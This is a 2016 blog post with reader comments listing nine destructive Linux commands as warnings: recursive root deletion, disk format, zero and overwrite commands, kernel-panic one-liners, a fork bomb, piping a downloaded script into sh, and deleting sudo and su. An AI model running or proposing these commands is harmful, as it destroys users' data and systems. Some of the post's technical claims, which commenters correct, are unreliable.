Friday 30 December 2016

9 Lethal Linux Commands You Should Never Run



Delete Recursively

The Linux ability to delete anything you want without question is a godsend, especially after dealing with years of “That file can’t be deleted” errors in Windows. But Internet trolls will be quick to deceive you, presenting you with extremely dangerous removal commands that can wipe entire hard drives.
rm -rf /
This line executes the remove command rm with two toggles: -r which forces recursive deletion through all subdirectories and -f which forces deletion of read-only files without confirmation. The command is executed on the / root directory, essentially wiping your whole system clean.
Note, these days on most Linux systems if you tried doing this you’d get a warning. But the warning isn’t guaranteed, so just don’t do it.

Format Hard Drive

The terminal is especially tricky for Linux newbies because it provides several ways to accidentally wipe one’s hard drive. Recursive deletion is a big one, but here’s another:
mkfs.ext3 /dev/hda
This command formats the hard drive to use the ext3 filesystem. Disk drive formatting is not an inherently malicious action, but it does “reset” the drive such that it’s “as good as new”. In other words, a formatted hard drive is like a blank slate.
Formatting is useful for disk partitions and external drives, but executing it on an entire hard drive (such as /dev/hda) is dangerous and can leave your system in an unrecoverable state.


Overwrite Hard Drive


As if accidental disk formatting wasn’t bad enough, it’s possible to overwrite your hard drive using raw data. At least disk formatting is an actual procedure with real-life uses; directly overwriting one’s drive, on the other hand, is not so great.
command > /dev/hda
In the command above, command can be replaced by any Bash command. The > operator redirects the output from the command on its left to the file on its right. In this case, it doesn’t matter what the output of the left command is. That raw data is being redirected and used to overwrite the system hard drive.
As you can imagine, this renders it useless.

Wipe Hard Drive

Here’s another way to ruin your system. This time around, the command will completely zero out your hard drive. No data corruptions or overwrites; it will literally fill your hard drive with zeroes. A hard drive doesn’t get any more wiped than that.
dd if=/dev/zero of=/dev/hda
The dd command is a low-level instruction that’s mostly used to write data to physical drives. The if parameter determines the source of data, which in this case is /dev/zero, a special on Linux that produces an infinite stream of zeroes. The of parameter determines the destination of those zeroes, which is the /dev/hda drive.
Yes, there are legitimate reasons for zeroing a drive, but if you don’t know what those reasons are, then you’ll want to stay away from this command.

Implode Hard Drive

If you’re tired of hearing ways to wreck your hard drive, hang on. Here’s one more for you. On Linux, there’s a special file called /dev/null that will discard whatever data is written to it. You can think of it as a black hole or a file shredder: anything given to it as input will be eaten up for good.
mv / /dev/null
Can you spot the danger here? The mv command tries to move the system’s root directory / into the black hole of /dev/null. This is a valid command and the result is devastating: the hard drive gets eaten up and there’s nothing left. Doing this will make your system unusable.

Cause Kernel Panic

Windows has its infamous Blue Screen of Death. And despite the myths that float around, Linux is not a perfectly secure system. Sometimes, an internal error occurs from which recovery is impossible, so the system will enact something similar to the Blue Screen: a kernel panic.
dd if=/dev/random of=/dev/port

echo 1 > /proc/sys/kernel/panic

cat /dev/port

cat /dev/zero > /dev/mem
The intricacies of the above commands aren’t important here. What is important is that running any of those lines will result in a kernel panic, forcing you to reboot your system. It’s best to stay away from these commands unless you’re absolutely sure you know what you’re doing.

Fork Bomb

Bash is the language of the Linux terminal and it’s powerful. Not only can it run commands but it can also run functions, which makes it easy to write scripts that can automate system tasks. Unfortunately, functions don’t come without their own set of risks.

:(){:|:&};:
This obscure command is called a fork bomb, which is a special type of kernel panic. It defines a function named : that recursively calls itself twice when executed. One of the recursive calls happens in the foreground while the other happens in the background.
In other words, whenever this function executes, it spawns two child processes. Those child processes spawn their own child processes, and this cycle keeps going in an infinite loop. The only way out of it is to reboot the system.

Execute Remote Script

Here’s an innocent command that can actually be useful in day-to-day life on a Linux system. wget retrieves the contents of a web URL, which can be used to access websites or download files. However, there’s a simple trick that turns it dangerous:
wget http://an-untrusted-url -O- | sh
The above combination downloads the contents of the given URL and immediately feeds it to the sh command, which executes the downloaded contents in the terminal. If the URL were to point to a malicious script, you’d be sealing your own fate with this command.

Disable Root Command Rights

This final command is straightforward. It utilizes the commonly used rm command to disable two of the most important commands on Linux: sudo and su. Long story short, these two allow you to run other commands with root permissions. Without them, life on Linux would be miserable.
rm -f /usr/bin/sudo;rm -f /bin/su
Which is why you shouldn’t run this command. It force deletes both commands from your system without any confirmation, leaving you in a jam. There are ways to restore what you’ve deleted, but it’s not always straightforward nor will it be pleasant.
source:makeuseof.com

7 comments:

  1. An entertaining article! I've actually ran many of these commands as part of daily tasks: e.g. reformatting an external hard drive (mkfs), or zeroing out an old hard drive (dd if=/dev/zero) before selling or tossing a computer.

    One note, though: a fork bomb is not kernel panic... True, it can eventually lead to out-of-memory errors, but it can also run for a good bit (quite spectacularly!), simply causing the system to be slower and slower. You can even stop it after the fact by killing the parent process (the shell) and all it's child processes, although I don't recall how precisely. Linux does kill misbehaving processes which consume too much memory (the OOM killer https://linux-mm.org/OOM_Killer), but it looks like it doesn't handle fork bombs since the memory usage is spread across many (small) child processes.

    As I wrote this post, I ran a fork bomb on a live CD to confirm my memory. The X11 sceen froze before a kernel panic ever displayed. (I wonder whether doing it from a virtual terminal would act differently...) Thanks for reminding me of the joy of that! I recommend trying that on a live CD or fresh instal to anyone who hasn't seen the OS come to such a dramatic halt!

    ReplyDelete
    Replies
    1. Also, do you *really* have an IDE disk in 2016? Wow! I haven't seen hda in a while... (A SATA disk is listed as sda.)

      Delete
  2. You can still have an IDE disk without an ide interface. I have still one or maybe two IDE CD drive/writers, but on an IDE/SATA converter, so they report as scd{0,1}, while in fact at least one of them is an IDE drive. But I admit, having IDE disk drives anno 2016 is rare.

    ReplyDelete
  3. "mv / /dev/null" should fail with an error message, since /dev/null is (treated) as a file.

    I tried a harmless example "mv dir file", and it failed with "mv: cannot overwrite non-directory 'file' with directory 'dir'".

    ReplyDelete
  4. Saying disk formatting makes it clean is absolutely false, it doesn't touch most of the on-disk data, only the ones that happen to be where the filesystem needs to place its own data.

    Wiping/overwriting a drive is the process where the drive is cleaned; while there's no such thing as truly clean, that's the closest, as the drive will still have either zeros or ones as its content. I guess it's structural limitation.

    ReplyDelete
    Replies
    1. And I'm not fully sure about moving the root filesystem to blackhole, that whether it actually deletes the data or just writes to filesystem internals that space is available.

      Delete
    2. You would be correct in most cases though it may depend on the file system and setup. If you were to move the file system to a black hole, you should be able to recover some of the data with a ton of work and good tools but you would need unmount the drive right away and clone it with dd. Now if you really want to have some fun run linux off a mem drive or live cd. Mount the partition off the hard drive, move the contents to /dev/null and then defrag then the partition and then resize it to say 50%. Create a new partition with the extra space and alternate writing 1 and 0 to the new partition for lets say 7 times. Then Remove the new partition, resize the old partition back to 100% and see how much many files you can recover. Should be an interesting experiment.

      Delete